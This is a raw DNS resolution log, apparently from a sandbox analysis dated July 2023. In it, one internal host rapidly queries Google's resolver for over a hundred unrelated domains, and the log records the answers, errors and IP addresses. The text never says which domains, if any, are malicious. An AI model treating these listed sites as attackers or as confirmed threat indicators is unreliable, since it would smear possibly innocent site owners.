                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.727910995 CEST8.8.8.8192.168.2.60x1675No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.763750076 CEST8.8.8.8192.168.2.60x1f95Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.771034002 CEST8.8.8.8192.168.2.60x8a3dName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.785902977 CEST8.8.8.8192.168.2.60x1b6bNo error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.790505886 CEST8.8.8.8192.168.2.60xfe82No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.790505886 CEST8.8.8.8192.168.2.60xfe82No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.791584015 CEST8.8.8.8192.168.2.60xde1dNo error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.801580906 CEST8.8.8.8192.168.2.60x1d52Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.807429075 CEST8.8.8.8192.168.2.60xb3beServer failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.808346987 CEST8.8.8.8192.168.2.60x471aNo error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.814244986 CEST8.8.8.8192.168.2.60x8917Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.819968939 CEST8.8.8.8192.168.2.60xfb1bNo error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.826155901 CEST8.8.8.8192.168.2.60x7d27No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.845465899 CEST8.8.8.8192.168.2.60x882cNo error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.869429111 CEST8.8.8.8192.168.2.60xd737Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.869473934 CEST8.8.8.8192.168.2.60x4118No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.869473934 CEST8.8.8.8192.168.2.60x4118No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.876346111 CEST8.8.8.8192.168.2.60xda1dName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.916877985 CEST8.8.8.8192.168.2.60x4d3cNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.918880939 CEST8.8.8.8192.168.2.60x7850Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.970707893 CEST8.8.8.8192.168.2.60x5ca6No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.986152887 CEST8.8.8.8192.168.2.60xf495Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.023109913 CEST8.8.8.8192.168.2.60xca8eNo error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.023109913 CEST8.8.8.8192.168.2.60xca8eNo error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.029257059 CEST8.8.8.8192.168.2.60x16daNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.074388981 CEST8.8.8.8192.168.2.60x4944No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.081384897 CEST8.8.8.8192.168.2.60x8dd4No error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.081384897 CEST8.8.8.8192.168.2.60x8dd4No error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.131943941 CEST8.8.8.8192.168.2.60x6b0bNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.211374044 CEST8.8.8.8192.168.2.60x5157Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.220295906 CEST8.8.8.8192.168.2.60x593bNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.229717016 CEST8.8.8.8192.168.2.60x53c0Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.329473019 CEST8.8.8.8192.168.2.60x779eNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.329473019 CEST8.8.8.8192.168.2.60x779eNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.329473019 CEST8.8.8.8192.168.2.60x779eNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.330048084 CEST8.8.8.8192.168.2.60xdeacNo error (0)yhsll.com102.134.49.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.343455076 CEST8.8.8.8192.168.2.60xfd0fName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.417403936 CEST8.8.8.8192.168.2.60x365eNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.417403936 CEST8.8.8.8192.168.2.60x365eNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.417403936 CEST8.8.8.8192.168.2.60x365eNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.417403936 CEST8.8.8.8192.168.2.60x365eNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.465090036 CEST8.8.8.8192.168.2.60xaa93Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.500039101 CEST8.8.8.8192.168.2.60x4611No error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.500039101 CEST8.8.8.8192.168.2.60x4611No error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.516364098 CEST8.8.8.8192.168.2.60x1613No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.618882895 CEST8.8.8.8192.168.2.60xd061No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.890566111 CEST8.8.8.8192.168.2.60x52b1No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.903502941 CEST8.8.8.8192.168.2.60x7cb9No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.919400930 CEST8.8.8.8192.168.2.60x570dServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.929874897 CEST8.8.8.8192.168.2.60x3773No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:06.962436914 CEST8.8.8.8192.168.2.60xca4eServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.011244059 CEST8.8.8.8192.168.2.60x7fe1Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.016107082 CEST8.8.8.8192.168.2.60x70d5No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.019496918 CEST8.8.8.8192.168.2.60x1696No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.036315918 CEST8.8.8.8192.168.2.60xb92No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.078351021 CEST8.8.8.8192.168.2.60x691No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.079854012 CEST8.8.8.8192.168.2.60xb1fcName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.099735975 CEST8.8.8.8192.168.2.60xb23fNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.103580952 CEST8.8.8.8192.168.2.60x24e0Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.111848116 CEST8.8.8.8192.168.2.60x7d4No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.186753035 CEST8.8.8.8192.168.2.60x7cfeNo error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.195154905 CEST8.8.8.8192.168.2.60x38a7Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.223047018 CEST8.8.8.8192.168.2.60x6084Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.252017975 CEST8.8.8.8192.168.2.60x44ddNo error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.254637957 CEST8.8.8.8192.168.2.60xbc3bName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.280670881 CEST8.8.8.8192.168.2.60xe8No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.320091009 CEST8.8.8.8192.168.2.60xbdf4Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.399045944 CEST8.8.8.8192.168.2.60x5dcaNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.414562941 CEST8.8.8.8192.168.2.60xb552No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.453461885 CEST8.8.8.8192.168.2.60x89b6No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.488708973 CEST8.8.8.8192.168.2.60xf41Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.687721968 CEST8.8.8.8192.168.2.60xecc0No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.761964083 CEST8.8.8.8192.168.2.60x98ceNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.782246113 CEST8.8.8.8192.168.2.60x9065No error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.782246113 CEST8.8.8.8192.168.2.60x9065No error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.807008982 CEST8.8.8.8192.168.2.60x9483Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.837738037 CEST8.8.8.8192.168.2.60xb963No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.920793056 CEST8.8.8.8192.168.2.60xe6e6No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.935445070 CEST8.8.8.8192.168.2.60xaa93Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:07.986664057 CEST8.8.8.8192.168.2.60xc57eNo error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.005839109 CEST8.8.8.8192.168.2.60x3e78No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.035604954 CEST8.8.8.8192.168.2.60xc7edNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.047862053 CEST8.8.8.8192.168.2.60x2b54No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.084656000 CEST8.8.8.8192.168.2.60xca0cNo error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.084656000 CEST8.8.8.8192.168.2.60xca0cNo error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.110944986 CEST8.8.8.8192.168.2.60xc464No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.126614094 CEST8.8.8.8192.168.2.60xed1cName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.134634018 CEST8.8.8.8192.168.2.60xa1d1No error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.207006931 CEST8.8.8.8192.168.2.60x32adName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.239038944 CEST8.8.8.8192.168.2.60x2a13Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.262196064 CEST8.8.8.8192.168.2.60x88b7Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.290590048 CEST8.8.8.8192.168.2.60xfd43No error (0)vivastay.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.290590048 CEST8.8.8.8192.168.2.60xfd43No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.290590048 CEST8.8.8.8192.168.2.60xfd43No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.290590048 CEST8.8.8.8192.168.2.60xfd43No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.297998905 CEST8.8.8.8192.168.2.60x1ecbNo error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.349237919 CEST8.8.8.8192.168.2.60x15d0No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.369124889 CEST8.8.8.8192.168.2.60xf86aNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.369124889 CEST8.8.8.8192.168.2.60xf86aNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.369124889 CEST8.8.8.8192.168.2.60xf86aNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.369124889 CEST8.8.8.8192.168.2.60xf86aNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.413296938 CEST8.8.8.8192.168.2.60x704No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.452066898 CEST8.8.8.8192.168.2.60x4025No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.494669914 CEST8.8.8.8192.168.2.60x98f3No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.498370886 CEST8.8.8.8192.168.2.60xea10No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.513140917 CEST8.8.8.8192.168.2.60xf01aNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.546325922 CEST8.8.8.8192.168.2.60x800cNo error (0)rkengg.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.546325922 CEST8.8.8.8192.168.2.60x800cNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.546325922 CEST8.8.8.8192.168.2.60x800cNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.546325922 CEST8.8.8.8192.168.2.60x800cNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.594875097 CEST8.8.8.8192.168.2.60xb767No error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.620392084 CEST8.8.8.8192.168.2.60x6ccServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.737432957 CEST8.8.8.8192.168.2.60xfa6eNo error (0)rkengg.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.737432957 CEST8.8.8.8192.168.2.60xfa6eNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.737432957 CEST8.8.8.8192.168.2.60xfa6eNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.737432957 CEST8.8.8.8192.168.2.60xfa6eNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.794374943 CEST8.8.8.8192.168.2.60xbc7dNo error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.801997900 CEST8.8.8.8192.168.2.60xe04dNo error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.801997900 CEST8.8.8.8192.168.2.60xe04dNo error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.808033943 CEST8.8.8.8192.168.2.60xd552No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.876960039 CEST8.8.8.8192.168.2.60xd609No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.928327084 CEST8.8.8.8192.168.2.60x4751Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.980380058 CEST8.8.8.8192.168.2.60xc7f3Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:08.986639977 CEST8.8.8.8192.168.2.60xcbb8No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.017591953 CEST8.8.8.8192.168.2.60x84d7No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.032481909 CEST8.8.8.8192.168.2.60x371fServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.056778908 CEST8.8.8.8192.168.2.60xcf2eNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.106226921 CEST8.8.8.8192.168.2.60x6d2fNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.111498117 CEST8.8.8.8192.168.2.60xc9f1No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.111788988 CEST8.8.8.8192.168.2.60x7cd6No error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.203025103 CEST8.8.8.8192.168.2.60x59fdNo error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.203989983 CEST8.8.8.8192.168.2.60x81e2No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.203989983 CEST8.8.8.8192.168.2.60x81e2No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.242048979 CEST8.8.8.8192.168.2.60xfb77No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.432339907 CEST8.8.8.8192.168.2.60x6381No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.464417934 CEST8.8.8.8192.168.2.60x7f86No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.464417934 CEST8.8.8.8192.168.2.60x7f86No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.533531904 CEST8.8.8.8192.168.2.60xdb4dServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.548139095 CEST8.8.8.8192.168.2.60xdff0No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.556534052 CEST8.8.8.8192.168.2.60x228aNo error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.593553066 CEST8.8.8.8192.168.2.60x677No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.657726049 CEST8.8.8.8192.168.2.60xfc7bNo error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.702898026 CEST8.8.8.8192.168.2.60x357cNo error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.721930981 CEST8.8.8.8192.168.2.60x60eeNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.721930981 CEST8.8.8.8192.168.2.60x60eeNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.721930981 CEST8.8.8.8192.168.2.60x60eeNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.721930981 CEST8.8.8.8192.168.2.60x60eeNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.727647066 CEST8.8.8.8192.168.2.60xbeebNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.823929071 CEST8.8.8.8192.168.2.60x3f4dNo error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.844090939 CEST8.8.8.8192.168.2.60xeb50No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.899548054 CEST8.8.8.8192.168.2.60xcc31No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.899548054 CEST8.8.8.8192.168.2.60xcc31No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.899548054 CEST8.8.8.8192.168.2.60xcc31No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.917802095 CEST8.8.8.8192.168.2.60xa83No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.919967890 CEST8.8.8.8192.168.2.60xd4b1No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.919967890 CEST8.8.8.8192.168.2.60xd4b1No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:09.953372002 CEST8.8.8.8192.168.2.60x2b74Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.124602079 CEST8.8.8.8192.168.2.60x7863No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:10.124602079 CEST8.8.8.8192.168.2.60x7863No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
